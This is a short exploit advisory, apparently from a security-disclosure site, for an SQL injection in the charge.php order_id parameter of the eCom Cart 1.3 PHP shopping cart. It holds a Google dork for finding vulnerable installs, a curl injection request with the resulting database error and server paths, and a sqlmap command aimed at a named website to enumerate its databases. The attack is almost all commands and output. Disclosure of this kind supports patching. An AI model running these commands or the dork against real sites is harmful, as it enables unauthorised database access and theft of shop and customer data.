eCom Cart 1.3 SQL Injection

2017.06.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: eCom Cart 1.3 Exploit # Google Dork: inurl:"/pdetails/11" ([11] is variable) # Date: 10.06.2017 # Exploit Author: Alperen Eymen Ozcan & Batuhan Camci # Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007 # Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007 # Version: 1.3 # Tested on: Linux $ curl http://localhost/ecom-cart/charge.php -d order_id=%271 Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 1 in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16 Stack trace: #0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16): PDO->query('SELECT * FROM 3...') #1 {main} thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php on line 16 $ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top